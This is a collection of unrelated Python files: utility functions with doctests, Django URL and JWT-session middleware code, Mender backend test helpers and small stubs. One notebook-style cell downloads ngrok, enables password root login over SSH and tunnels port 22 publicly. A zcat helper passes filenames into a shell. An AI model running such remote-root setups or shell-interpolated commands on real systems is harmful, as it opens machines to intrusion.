def mtime(filename):
"Return the mtime of filename, or the epoch if it doesn't exist."
try:
return os.stat(filename).st_mtime
except FileNotFoundError:
return 0
def path_configured(path):
if (cpath is None):
raise No_Configuration_Read()
return abspath(path, cpath)
def partition_sentinel(iter_, sentinel):
'''Partition an iterable at the first occurrence of a sentinel; return two
lists containing each partition. The sentinel is not included in either.
For example:
>>> partition_sentinel([1,2,3,4], 2)
([1], [3, 4])
>>> partition_sentinel([1,2,3,4], 'not_in_list')
([1, 2, 3, 4], [])
>>> partition_sentinel([], 2)
([], [])
>>> partition_sentinel([1,2,3,4], 4)
([1, 2, 3], [])
>>> partition_sentinel([1,2,3,4], 1)
([], [2, 3, 4])
>>> partition_sentinel(8675309, 2)
Traceback (most recent call last):
...
TypeError: 'int' object is not iterable'''
a = list()
iter2 = iter(iter_)
for i in iter2:
if (i == sentinel):
break
a.append(i)
b = list(iter2)
return (a, b)
def parse_args(ap, args=sys.argv[1:]):
'''Parse command line arguments and set a few globals based on the result.
Note that this function must be called before logging_init().'''
try:
args = shlex.split(os.environ['QUACARGS']) + args
except KeyError:
pass
args = ap.parse_args(args)
try:
multicore.init(args.cores)
except AttributeError:
pass
try:
rand.seed(args.random_seed)
rand_np.seed(args.random_seed)
except AttributeError:
pass
try:
global verbose
verbose = args.verbose
except AttributeError:
pass
try:
global log_timestamps
log_timestamps = not args.notimes
except AttributeError:
pass
return args
def pickle_dump(file_, obj):
t = time.time()
if (isinstance(file_, str)):
filename = file_
if (not filename.endswith(PICKLE_SUFFIX)):
filename += PICKLE_SUFFIX
fp = gzip.open(filename, 'wb', compresslevel=9)
else:
filename = '???'
fp = file_
pickle.dump(obj, fp, pickle.HIGHEST_PROTOCOL)
l.debug('pickled %s in %s' % (filename, fmt_seconds(time.time() - t)))
def pickle_load(file_):
t = time.time()
if (isinstance(file_, str)):
filename = file_
if (os.path.exists(filename)):
# bare filename exists, try that
if (filename.endswith(PICKLE_SUFFIX)):
fp = gzip.open(filename)
else:
fp = io.open(filename, 'rb')
elif (os.path.exists(filename + PICKLE_SUFFIX)):
# filename plus suffix exists, try that
fp = gzip.open(filename + PICKLE_SUFFIX)
else:
# neither exists
raise IOError('neither %s nor %s exist'
% (filename, filename + PICKLE_SUFFIX))
else:
filename = '???'
fp = file_
obj = pickle.load(fp)
l.debug('unpickled %s in %s' % (filename, fmt_seconds(time.time() - t)))
return obj
def slp(text):
'''Parse a Python index or slice notation and return a slice object. A bare
index (no colons) gets you a slice returning a one-element list with
that index (or an empty list if out-of-bounds) -- this is different than
calling slice() with that argument. An empty string gets you an empty
list. For example:
>>> a = [0, 1, 2, 3]
>>> a[slp('1:3')]
[1, 2]
>>> a[1:3]
[1, 2]
>>> a[slp('2')]
[2]
>>> a[slice(2)]
[0, 1]
>>> [a[2]]
[2]
>>> a[slp('')]
[]'''
# see http://stackoverflow.com/questions/680826/
args = [(int(s) if s.strip() else None) for s in text.split(':')]
if (len(args) == 1 and args[0] is None):
return slice(0)
elif (len(args) == 1 and isinstance(args[0], int)):
start = args[0]
stop = start + 1 if (start != -1) else None
return slice(start, stop)
else:
return slice(*args)
def sl_union(len_, *slices):
'''Given a sequence length and some slices, return the sequence of indexes
which form the union of the given slices. For example:
>>> sorted(sl_union(10, slp('0'), slp('2:4'), slp('-2:')))
[0, 2, 3, 8, 9]
Note that this function instantiates lists of length len_ (because
range() iterators don't support slicing).'''
indexes = set()
for sl in slices:
indexes.update(list(range(len_))[sl])
return indexes
def sl_union_fromtext(len_, slicetext):
"""e.g.:
>>> sorted(sl_union_fromtext(10, '0,2:4,-2:'))
[0, 2, 3, 8, 9]"""
return sl_union(len_, *list(map(slp, slicetext.split(','))))
def stdout_restore():
global stdout_copy_fno
os.dup2(stdout_copy_fno, 1)
# WARNING: Voodoo! This sets stdout to be line-buffered.
sys.stdout = os.fdopen(1, 'w', 1)
stdout_copy_fno = None
def stdout_silence():
'''Some libraries (we're looking at you, SpatiaLite!) print junk to stdout
when they're loaded. This function will silence that output, even if
it's coming from outside Python. Use stdout_unsilence() to put things
back to normal.'''
# http://stackoverflow.com/questions/4178614
devnull = open('/dev/null', 'w')
global stdout_copy_fno
stdout_copy_fno = os.dup(sys.stdout.fileno())
sys.stdout.flush()
os.dup2(devnull.fileno(), 1)
def str_to_dict(text):
'''Convert a whitespace- and colon- separated string to a dict, with values
as either ints, floats, or strs (whichever converts without exception
first. For example:
>>> pprint(str_to_dict('a:b c:1 d:1.0'))
{'a': 'b', 'c': 1, 'd': 1.0}
>>> pprint(str_to_dict('a:1 a:2'))
{'a': 2}
>>> pprint(str_to_dict(''))
{}
>>> pprint(str_to_dict(' '))
{}
>>> pprint(str_to_dict(None))
{}
>>> pprint(str_to_dict('a::b:c'))
{'a': ':b:c'}
>>> pprint(str_to_dict('a:1 \vb:1'))
{'a': 1, 'b': 1}'''
if (text is None):
return dict()
d = dict()
for kv in text.split():
(k, _, v) = kv.partition(':')
d[k] = intfloatpass(v)
return d
def StringIO():
'''Return an in-memory buffer that you can put unicode into and get encoded
bytes out of (with the buffer attribute). It's much like io.StringIO,
except that doesn't let you get the encoded bytes.'''
return io.TextIOWrapper(io.BytesIO(), encoding='utf8')
def without_common_prefix(paths):
'''Return paths with common prefix removed. For example:
>>> without_common_prefix(['/a/b/c', '/a/b/doogiehauser'])
['c', 'doogiehauser']
If paths has only one element, strip all directories:
>>> without_common_prefix(['/a/b'])
['b']
If paths is empty, return the empty list:
>>> without_common_prefix([])
[]
If one or more paths are equal to the common prefix, they will become
the empty string:
>>> without_common_prefix(['/a/b', '/a/b/c'])
['', '/c']'''
if (len(paths) == 0):
return list()
elif (len(paths) == 1):
return [os.path.basename(paths[0])]
else:
strip_ct = 0
for cvec in zip(*paths):
if (len(set(cvec)) > 1):
break
strip_ct += 1
return [i[strip_ct:] for i in paths]
def url_decode(url):
"""Given a URL fragment which may or may not be percent-encoded, return the
decoded version with appropriate non-ASCII Unicode characters, with
underscores replaced with spaces.
>>> url_decode('Sandy_Koufax')
'Sandy Koufax'
>>> url_decode('Sandy Koufax')
'Sandy Koufax'
>>> url_decode('Sandy%20Koufax')
'Sandy Koufax'
>>> url_decode('Doen%C3%A7a_cong%C3%AAnita')
'Doença congênita'
>>> url_decode('Doença%20cong%C3%AAnita')
'Doença congênita'
>>> url_decode('Doença congênita')
'Doença congênita'"""
url = urllib.parse.unquote(url)
url = url.replace('_', ' ')
return url
def url_encoded(url):
"""Given a URL fragment string which may already be percent-encoded, and
which may contain non-ASCII characters, return it as a percent-encoded
ASCII string with underscores instead of spaces.
>>> url_encoded('Sandy_Koufax')
'Sandy_Koufax'
>>> url_encoded('Sandy Koufax')
'Sandy_Koufax'
>>> url_encoded('Sandy%20Koufax')
'Sandy_Koufax'
>>> url_encoded('Doen%C3%A7a_cong%C3%AAnita')
'Doen%C3%A7a_cong%C3%AAnita'
>>> url_encoded('Doença%20cong%C3%AAnita')
'Doen%C3%A7a_cong%C3%AAnita'
>>> url_encoded('Doença congênita')
'Doen%C3%A7a_cong%C3%AAnita'"""
url = url_decode(url)
url = url.replace(' ', '_')
url = urllib.parse.quote(url)
return url
def without_ext(filename, ext):
"""Return filename with extension ext (which may or may not begin with a
dot, and which may contain multiple dots) stripped. Raise ValueError if
the file doesn't have that extension. For example:
>>> without_ext('foo.tar.gz', '.tar.gz')
'foo'
>>> without_ext('foo.tar.gz', 'tar.gz')
'foo'
>>> without_ext('foo.tar.bz2', 'tar.gz')
Traceback (most recent call last):
...
ValueError: foo.tar.bz2 does not have extension .tar.gz
"""
if (ext[0] != '.'):
ext = '.' + ext
fn_new = re.sub('%s$' % (ext), '', filename)
if (fn_new == filename):
raise ValueError('%s does not have extension %s' % (filename, ext))
return fn_new
def zcat(filename, pipeline="zcat '%s'"):
'''Return an open file descriptor containing the uncompressed content of the
given gzipped file. This is very roughly up to 10× faster than
gzip.open() (in one informal test) but costs an extra process that
consumes some CPU.
Warning: Because this uses shell pipelines, it should not be given
untrusted input.
Zombie processes are reaped when Popen object is garbage collected.'''
return subprocess.Popen(pipeline % filename, shell=True,
stdout=subprocess.PIPE).stdout
def zero_attrs(obj, attrs):
'''e.g.:
>>> class A(object):
... pass
>>> a = A()
>>> zero_attrs(a, ('a', 'b', 'c'))
>>> pprint(vars(a))
{'a': 0, 'b': 0, 'c': 0}'''
for attr in attrs:
setattr(obj, attr, 0)
# Functions to format numbers with K, M, etc. suffixes.
# e.g.: fmt_bytes(2048) -> 2KiB
#
# Partly based on http://stackoverflow.com/questions/1094841
def fmt_seconds(num):
return str(timedelta(seconds=int(round(num))))
def fmt_si(num):
"""e.g.:
>>> fmt_si(1)
'1.00'
>>> fmt_si(10**3)
'1.00k'
>>> fmt_si(2**10)
'1.02k'"""
return fmt_real(num, 1000, ["", "k", "M", "G", "T", "P"])
def fmt_sparsearray(a):
nonsparse = ", ".join(str(i) for i in enumerate(a)
if i[1] != 0 and not np.isnan(i[1]))
return ('{%dz %dn%s%s}' % (sum(1 for i in a if i == 0),
sum(1 for i in a if np.isnan(i)),
' ' if nonsparse else '', nonsparse))
def fmt_bytes(num):
"""e.g.:
>>> fmt_bytes(1)
'1.00B'
>>> fmt_bytes(10**3)
'1000.00B'
>>> fmt_bytes(2**10)
'1.00KiB'
>>> fmt_bytes(10**6)
'976.56KiB'
>>> fmt_bytes(2**20)
'1.00MiB'
>>> fmt_bytes(2**30)
'1.00GiB'
>>> fmt_bytes(2**31)
'2.00GiB'
>>> fmt_bytes(2**32+1)
'4.00GiB'"""
return fmt_real(num, 1024, ["B", "KiB", "MiB", "GiB", "TiB", "PiB"])
def fmt_real(num, factor, units):
'''e.g.:
>>> fmt_real(1.23456, 10, ('a', 'b'))
'1.23a'
>>> fmt_real(12.3456, 10, ('a', 'b'))
'1.23b'
>>> fmt_real(-1.23456, 10, ('a', 'b'))
'-1.23a'
>>> fmt_real(-12.3456, 10, ('a', 'b'))
'-1.23b'
>>> fmt_real(123.456, 10, ('a', 'b'))
Traceback (most recent call last):
...
ValueError: number too large'''
if (num >= 0):
sign = ''
else:
sign = '-'
num *= -1
factor = float(factor)
for unit in units:
if (num < factor):
return ("%s%.2f%s" % (sign, num, unit))
num /= factor
raise ValueError('number too large')
# Default logger to allow testing. You should never actually see output from
# this unless tests fail.
logging_init('tstng', level=logging.WARNING)
quacbase = os.path.abspath(module_dir() + '/..')
testable.register('''
# Make sure random seed is set to a known value
>>> rand.random()
0.40224696110279223
# Memoized function fails with TypeError if passed an unhashable argument.
>>> @memoize
... def f(x):
... return x*2
>>> f(dict())
Traceback (most recent call last):
...
TypeError: unhashable type: 'dict'
# Check that memoized reset() works by looking at exposed cache.
>>> f(1)
2
>>> f.cache
{(1,): 2}
>>> f.reset()
>>> f.cache
{}
# More slices. Basically, we want (almost) the same behavior as if we had
# typed the slice into the Python interpreter. The "and None" trick is simply
# to suppress output if the expression is true, so we don't have to keep
# typing "True".
>>> a = [0, 1, 2, 3, 4]
>>> (a[slp(':')] == a) and None
>>> (a[slp('0')] == [a[0]]) and None
>>> (a[slp('4')] == [a[4]]) and None
>>> a[slp('5')]
[]
>>> (a[slp('-1')] == [a[-1]]) and None
>>> (a[slp('-2')] == [a[-2]]) and None
>>> (a[slp('-5')] == [a[-5]]) and None
>>> a[slp('-6')]
[]
>>> (a[slp('1:')] == a[1:]) and None
>>> (a[slp(':1')] == a[:1]) and None
>>> (a[slp('-2:')] == a[-2:]) and None
>>> (a[slp(':-2')] == a[:-2]) and None
>>> (a[slp('1::')] == a[1::]) and None
>>> (a[slp('::1')] == a[::1]) and None
>>> (a[slp('2::')] == a[2::]) and None
>>> (a[slp('::2')] == a[::2]) and None
>>> (a[slp('-1::')] == a[-1::]) and None
>>> (a[slp('::-1')] == a[::-1]) and None
# More unioned slices
>>> sl_union(10) # no slices
set()
>>> sl_union(0, slp('1')) # empty list
set()
>>> sorted(sl_union(10, slp('1:4'))) # one slice
[1, 2, 3]
>>> sorted(sl_union(10, slp('1:4'), slp('3'))) # overlapping slices
[1, 2, 3]
>>> sl_union(10, slp('10')) # fully out of bounds
set()
>>> sl_union(10, slp('9:11')) # partly out of bounds
{9}
>>> sl_union(10, slp('9'), slp('10')) # one in, one out
{9}
''')
# LocalWords: pformat pprint
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(
regex=r'^$',
view=views.TypeListView.as_view(),
name='type-list'
),
url(r'^delivery/$', view=views.LetterFormView.as_view(), name='delivery'),
]
|
default_app_config = 'baserow.contrib.database.config.DatabaseConfig'
|
DESCRIPTIONS = {
400: {
"title": "400 Bad Request",
"description": "The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).",
"fix": "Please your request's syntax, framing, and routing.",
},
404: {
"title": "404 Not Found",
"description": "The server can't find the requested resource.",
"fix": "Please check your request's URL.",
},
500: {
"title": "500 Internal Server Error",
"description": "The server encountered an unexpected condition, and prevented it from fulfilling the request...",
"fix": "This is my fault.",
},
}
|
#!/usr/bin/python3
import aiohttp
import asyncio
import threading
import time
import os
import sys
import random
import binascii
import csv
import requests
# import dotenv
# from dotenv import load_dotenv
# load_dotenv()
# MY_ENV_VAR = os.getenv('NODES')
nodes = int(sys.argv[1])
count = int(sys.argv[2])
with open('./IDs.csv', mode='w') as csv_file:
writer = csv.writer(csv_file)
for i in range(count):
for j in range(nodes):
id = str(binascii.b2a_hex(os.urandom(3)))[2:-1]
writer.writerow([j + 1, id])
|
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pytest
import random
import time
import string
import tempfile
import os
import subprocess
from contextlib import contextmanager
import docker
import redo
import requests
import testutils.api.deviceauth as deviceauth
import testutils.api.tenantadm as tenantadm
import testutils.api.useradm as useradm
import testutils.util.crypto
from testutils.api.client import ApiClient, GATEWAY_HOSTNAME
from testutils.infra.container_manager.kubernetes_manager import isK8S
from testutils.infra.mongo import MongoClient
from testutils.infra.cli import CliUseradm, CliTenantadm
@pytest.fixture(scope="session")
def mongo():
return MongoClient("mender-mongo:27017")
@pytest.fixture(scope="function")
def clean_mongo(mongo):
"""Fixture setting up a clean (i.e. empty database). Yields
pymongo.MongoClient connected to the DB."""
mongo_cleanup(mongo)
yield mongo.client
def mongo_cleanup(mongo):
mongo.cleanup()
class User:
def __init__(self, id, name, pwd):
self.name = name
self.pwd = pwd
self.id = id
class Authset:
def __init__(self, id, did, id_data, pubkey, privkey, status):
self.id = id
self.did = did
self.id_data = id_data
self.pubkey = pubkey
self.privkey = privkey
self.status = status
class Device:
def __init__(self, id, id_data, pubkey, tenant_token=""):
self.id = id
self.id_data = id_data
self.pubkey = pubkey
self.tenant_token = tenant_token
self.authsets = []
self.token = None
class Tenant:
def __init__(self, name, id, token):
self.name = name
self.users = []
self.devices = []
self.id = id
self.tenant_token = token
def create_random_authset(dauthd1, dauthm, utoken, tenant_token=""):
"""create_device with random id data and keypair"""
priv, pub = testutils.util.crypto.get_keypair_rsa()
mac = ":".join(["{:02x}".format(random.randint(0x00, 0xFF), "x") for i in range(6)])
id_data = {"mac": mac}
return create_authset(dauthd1, dauthm, id_data, pub, priv, utoken, tenant_token)
def create_authset(dauthd1, dauthm, id_data, pubkey, privkey, utoken, tenant_token=""):
body, sighdr = deviceauth.auth_req(id_data, pubkey, privkey, tenant_token)
# submit auth req
r = dauthd1.call("POST", deviceauth.URL_AUTH_REQS, body, headers=sighdr)
assert r.status_code == 401, r.text
# dev must exist and have *this* aset
api_dev = get_device_by_id_data(dauthm, id_data, utoken)
assert api_dev is not None
aset = [
a
for a in api_dev["auth_sets"]
if testutils.util.crypto.compare_keys(a["pubkey"], pubkey)
]
assert len(aset) == 1, str(aset)
aset = aset[0]
assert aset["identity_data"] == id_data
assert aset["status"] == "pending"
return Authset(aset["id"], api_dev["id"], id_data, pubkey, privkey, "pending")
def create_user(name, pwd, tid="", containers_namespace="backend-tests"):
cli = CliUseradm(containers_namespace)
uid = cli.create_user(name, pwd, tid)
return User(uid, name, pwd)
def create_org(
name,
username,
password,
plan="os",
containers_namespace="backend-tests",
container_manager=None,
):
cli = CliTenantadm(
containers_namespace=containers_namespace, container_manager=container_manager
)
user_id = None
tenant_id = cli.create_org(name, username, password, plan=plan)
tenant_token = json.loads(cli.get_tenant(tenant_id))["tenant_token"]
host = GATEWAY_HOSTNAME
if container_manager is not None:
host = container_manager.get_mender_gateway()
api = ApiClient(useradm.URL_MGMT, host=host)
# Try log in every second for 3 minutes.
# - There usually is a slight delay (in order of ms) for propagating
# the created user to the db.
for i in range(3 * 60):
rsp = api.call("POST", useradm.URL_LOGIN, auth=(username, password))
if rsp.status_code == 200:
break
time.sleep(1)
assert (
rsp.status_code == 200
), "User could not log in within three minutes after organization has been created."
user_token = rsp.text
rsp = api.with_auth(user_token).call("GET", useradm.URL_USERS)
users = json.loads(rsp.text)
for user in users:
if user["email"] == username:
user_id = user["id"]
break
if user_id is None:
raise ValueError("Error retrieving user id.")
tenant = Tenant(name, tenant_id, tenant_token)
user = User(user_id, username, password)
tenant.users.append(user)
return tenant
def get_device_by_id_data(dauthm, id_data, utoken):
page = 0
per_page = 20
qs_params = {}
found = None
while True:
page = page + 1
qs_params["page"] = page
qs_params["per_page"] = per_page
r = dauthm.with_auth(utoken).call(
"GET", deviceauth.URL_MGMT_DEVICES, qs_params=qs_params
)
assert r.status_code == 200
api_devs = r.json()
found = [d for d in api_devs if d["identity_data"] == id_data]
if len(found) > 0:
break
if len(api_devs) == 0:
break
assert len(found) == 1, "device not found by id data"
return found[0]
def change_authset_status(dauthm, did, aid, status, utoken):
r = dauthm.with_auth(utoken).call(
"PUT",
deviceauth.URL_AUTHSET_STATUS,
deviceauth.req_status(status),
path_params={"did": did, "aid": aid},
)
assert r.status_code == 204
def rand_id_data():
mac = ":".join(["{:02x}".format(random.randint(0x00, 0xFF), "x") for i in range(6)])
sn = "".join(["{}".format(random.randint(0x00, 0xFF)) for i in range(6)])
return {"mac": mac, "sn": sn}
def make_pending_device(dauthd1, dauthm, utoken, tenant_token=""):
id_data = rand_id_data()
priv, pub = testutils.util.crypto.get_keypair_rsa()
new_set = create_authset(
dauthd1, dauthm, id_data, pub, priv, utoken, tenant_token=tenant_token
)
dev = Device(new_set.did, new_set.id_data, pub, tenant_token)
dev.authsets.append(new_set)
dev.status = "pending"
return dev
def make_accepted_device(dauthd1, dauthm, utoken, tenant_token=""):
dev = make_pending_device(dauthd1, dauthm, utoken, tenant_token=tenant_token)
aset_id = dev.authsets[0].id
change_authset_status(dauthm, dev.id, aset_id, "accepted", utoken)
aset = dev.authsets[0]
aset.status = "accepted"
# obtain auth token
body, sighdr = deviceauth.auth_req(
aset.id_data, aset.pubkey, aset.privkey, tenant_token
)
r = dauthd1.call("POST", deviceauth.URL_AUTH_REQS, body, headers=sighdr)
assert r.status_code == 200
dev.token = r.text
dev.status = "accepted"
return dev
def make_accepted_devices(devauthd, devauthm, utoken, tenant_token="", num_devices=1):
"""Create accepted devices.
returns list of Device objects."""
devices = []
# some 'accepted' devices, single authset
for _ in range(num_devices):
dev = make_accepted_device(devauthd, devauthm, utoken, tenant_token)
devices.append(dev)
return devices
@contextmanager
def get_mender_artifact(
artifact_name="test",
update_module="dummy",
device_types=("arm1",),
size=256,
depends=(),
provides=(),
):
data = "".join(random.choices(string.ascii_uppercase + string.digits, k=size))
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data.encode("utf-8"))
f.close()
#
filename = f.name
artifact = "%s.mender" % filename
args = [
"mender-artifact",
"write",
"module-image",
"-o",
artifact,
"--artifact-name",
artifact_name,
"-T",
update_module,
"-f",
filename,
]
for device_type in device_types:
args.extend(["-t", device_type])
for depend in depends:
args.extend(["--depends", depend])
for provide in provides:
args.extend(["--provides", provide])
try:
subprocess.call(args)
yield artifact
finally:
os.unlink(filename)
os.path.exists(artifact) and os.unlink(artifact)
def wait_until_healthy(compose_project: str = "", timeout: int = 60):
"""
wait_until_healthy polls all running containers health check
endpoints until they return a non-error status code.
:param compose_project: the docker-compose project ID, if empty it
checks all running containers.
:param timeout: timeout in seconds.
"""
client = docker.from_env()
kwargs = {}
if compose_project != "":
kwargs["filters"] = {"label": f"com.docker.compose.project={compose_project}"}
path_map = {
"mender-api-gateway": "/ping",
"mender-auditlogs": "/api/internal/v1/auditlogs/health",
"mender-deviceconnect": "/api/internal/v1/deviceconnect/health",
"mender-deviceconfig": "/api/internal/v1/deviceconfig/health",
"mender-device-auth": "/api/internal/v1/devauth/health",
"mender-deployments": "/api/internal/v1/deployments/health",
"mender-inventory": "/api/internal/v1/inventory/health",
"mender-tenantadm": "/api/internal/v1/tenantadm/health",
"mender-useradm": "/api/internal/v1/useradm/health",
"mender-workflows": "/api/v1/health",
"minio": "/minio/health/live",
}
containers = client.containers.list(all=True, **kwargs)
for container in containers:
container_ip = None
for _, net in container.attrs["NetworkSettings"]["Networks"].items():
container_ip = net["IPAddress"]
break
if container_ip is None or container_ip == "":
continue
service = container.labels.get(
"com.docker.compose.service", container.name
).split("-enterprise")[0]
if service.startswith("mender-workflows-server"):
service = "mender-workflows"
path = path_map.get(service)
if path is None:
continue
port = 8080 if service != "minio" else 9000
for _ in redo.retrier(attempts=timeout, sleeptime=1):
try:
rsp = requests.request("GET", f"http://{container_ip}:{port}{path}")
except requests.exceptions.ConnectionError:
# A ConnectionError is expected if the service is not running yet
continue
if rsp.status_code < 300:
break
else:
raise TimeoutError(
f"Timed out waiting for service '{service}' to become healthy"
)
def update_tenant(tid, addons=None, plan=None, container_manager=None):
"""Call internal PUT tenantadm/tenants/{tid}"""
update = {}
if addons is not None:
update["addons"] = tenantadm.make_addons(addons)
if plan is not None:
update["plan"] = plan
tenantadm_host = (
tenantadm.HOST
if isK8S() or container_manager is None
else container_manager.get_ip_of_service("mender-tenantadm")[0] + ":8080"
)
tadm = ApiClient(tenantadm.URL_INTERNAL, host=tenantadm_host, schema="http://")
res = tadm.call(
"PUT", tenantadm.URL_INTERNAL_TENANT, body=update, path_params={"tid": tid},
)
assert res.status_code == 202
|
from .job import Job
from .manager import Manager
from .scheduler import Scheduler
__author__ = 'Timur Faradzhov'
__copyright__ = 'Copyright 2019, The Pypyrus Runner Project'
__credits__ = ['Timur Faradzhov']
__license__ = 'MIT'
__version__ = '0.0.1'
__maintainer__ = 'Timur Faradzhov'
__email__ = 'timurfaradzhov@gmail.com'
__status__ = 'Production'
__doc__ = 'Python scheduler and job manager.'
|
import random, string, urllib.request, json, getpass
#Generate root password
password = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20))
#Download ngrok
! wget -q -c -nc https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
! unzip -qq -n ngrok-stable-linux-amd64.zip
#Setup sshd
! apt-get install -qq -o=Dpkg::Use-Pty=0 openssh-server pwgen > /dev/null
#Set root password
! echo root:$password | chpasswd
! mkdir -p /var/run/sshd
! echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
! echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
! echo "LD_LIBRARY_PATH=/usr/lib64-nvidia" >> /root/.bashrc
! echo "export LD_LIBRARY_PATH" >> /root/.bashrc
#Run sshd
get_ipython().system_raw('/usr/sbin/sshd -D &')
#Ask token
print("Copy authtoken from https://dashboard.ngrok.com/auth")
authtoken = getpass.getpass()
#Create tunnel
get_ipython().system_raw('./ngrok authtoken $authtoken && ./ngrok tcp 22 &')
#Get public address and print connect command
with urllib.request.urlopen('http://localhost:4040/api/tunnels') as response:
data = json.loads(response.read().decode())
(host, port) = data['tunnels'][0]['public_url'][6:].split(':')
print(f'SSH command: ssh -p{port} root@{host}')
#Print root password
print(f'Root password: {password}')
|
import bjoern
from app import app
bjoern.run(
wsgi_app=app,
host='0.0.0.0',
port=5000,
reuse_port=True
)
|
# -*- coding: utf-8 -*-
__author__ = 'ffuentes'
from datetime import datetime
from django.conf import settings
from django.contrib.auth.middleware import get_user
from django.contrib.auth.models import User
from django.contrib.sessions.models import Session
from django.contrib.sessions.backends.base import UpdateError
from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import redirect
from django.utils.cache import patch_vary_headers
from django.utils.functional import SimpleLazyObject
from django.utils.http import cookie_date
from graphql_jwt import signals
from graphql_jwt.settings import jwt_settings
from graphql_jwt.shortcuts import get_token, get_user_by_token
from graphql_jwt.refresh_token.shortcuts import refresh_token_lazy
from graphql_jwt.refresh_token.signals import refresh_token_rotated
from graphql_jwt.utils import get_credentials, get_payload
from graphql_jwt.exceptions import JSONWebTokenError, JSONWebTokenExpired
from importlib import import_module
import time
import logging
logger = logging.getLogger(__name__)
def token_is_expired(token):
ret = False
try:
get_payload(token)
except JSONWebTokenError:
ret = True
except JSONWebTokenExpired:
ret = True
return ret
def get_user_from_session_key(session_key):
session = Session.objects.get(session_key=session_key)
session_data = session.get_decoded()
uid = session_data.get('_auth_user_id')
user = User.objects.get(id=uid)
return user
def delete_jwt_cookie(request, response):
max_age = request.session.get_expiry_age()
anti_expires_time = cookie_date(time.time() - max_age)
response.set_cookie(
jwt_settings.JWT_COOKIE_NAME,
'',
domain=settings.COOKIE_DOMAIN,
expires=anti_expires_time,
secure=settings.JWT_COOKIE_SECURE or None,
httponly=settings.JWT_COOKIE_HTTPONLY or None,
samesite='Lax',
)
class SRIJWTAuthMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
session_created = False
has_token = False
# add user
request.user = SimpleLazyObject(lambda: get_user(request))
token = get_credentials(request)
if token is not None and token != '' and token != 'None' and \
not token_is_expired(token):
user = get_user_by_token(token, request)
request.user = user
has_token = True
# add session
if not hasattr(request, 'session'):
session_engine = import_module(settings.SESSION_ENGINE)
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
# if the session cannot be saved, start with an empty session
try:
request.session = session_engine.SessionStore(session_key)
request.session.save()
session_created = True
except UpdateError:
response = redirect(request.get_full_path())
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
response.delete_cookie(jwt_settings.JWT_COOKIE_NAME)
patch_vary_headers(response, ('Cookie',))
return response
max_age = request.session.get_expiry_age()
expires_time = time.time() + max_age
anti_expires_time = cookie_date(time.time() - max_age)
cookie_expires = cookie_date(expires_time)
if request.session.get_expire_at_browser_close():
max_age = None
cookie_expires = None
if token and token_is_expired(token):
cookie_token = request.COOKIES.get(jwt_settings.JWT_COOKIE_NAME)
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
if cookie_token and cookie_token != '""':
try:
user = get_user_from_session_key(session_key)
request.user = user
refresh_token_lazy(request.user)
token = get_token(request.user)
refresh_token_rotated.send(
sender=SRIJWTAuthMiddleware,
request=request,
refresh_token=self,
)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
except ObjectDoesNotExist:
## fallback solution
response = redirect(request.get_full_path())
delete_jwt_cookie(request, response)
patch_vary_headers(response, ('Cookie',))
return response
# process response with inner middleware
response = self.get_response(request)
if request.user.is_authenticated and not has_token:
token = get_token(request.user)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
# if token is expired, refresh it
if token_is_expired(token):
refresh_token_lazy(request.user)
token = get_token(request.user)
refresh_token_rotated.send(
sender=SRIJWTAuthMiddleware,
request=request,
refresh_token=self,
)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
#expires = datetime.utcnow() + jwt_settings.JWT_EXPIRATION_DELTA
response.set_cookie(
jwt_settings.JWT_COOKIE_NAME,
token,
domain=settings.COOKIE_DOMAIN,
max_age=max_age,
expires=cookie_expires,
secure=settings.JWT_COOKIE_SECURE or None,
httponly=settings.JWT_COOKIE_HTTPONLY or None,
samesite='Lax',
)
patch_vary_headers(response, ('Cookie',))
accessed = request.session.accessed
modified = request.session.modified
empty = request.session.is_empty()
# we'll force the session cookie creation if:
# * we have a valid token but we didn't have a session for the user
# * the session was not created because the user is logged in
create_session_cookie = token and session_created \
or token and not request.user.is_authenticated
if settings.SESSION_COOKIE_NAME in request.COOKIES and empty:
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
response.delete_cookie(jwt_settings.JWT_COOKIE_NAME)
patch_vary_headers(response, ('Cookie',))
else:
if accessed:
patch_vary_headers(response, ('Cookie',))
try:
SESSION_SAVE_EVERY_REQUEST = settings.SESSION_SAVE_EVERY_REQUEST
except AttributeError:
SESSION_SAVE_EVERY_REQUEST = None
if (modified or SESSION_SAVE_EVERY_REQUEST) and not empty or create_session_cookie:
# Save the session data and refresh the client cookie.
# Skip session save for 500 responses, refs #3881.
if response.status_code != 500:
try:
request.session.save()
except UpdateError:
raise SuspiciousOperation(
"The request's session was deleted before the "
"request completed. The user may have logged "
"out in a concurrent request, for example."
)
response.set_cookie(
settings.SESSION_COOKIE_NAME,
request.session.session_key, max_age=max_age,
expires=cookie_expires, domain=settings.SESSION_COOKIE_DOMAIN,
path=settings.SESSION_COOKIE_PATH,
secure=settings.SESSION_COOKIE_SECURE or None,
httponly=settings.SESSION_COOKIE_HTTPONLY or None,
samesite='Strict',
)
return response
|
import os
import shutil
import pickle
import numpy as np
import dnnlib
import dnnlib.tflib as tflib
import config
from encoder.generator_model import Generator
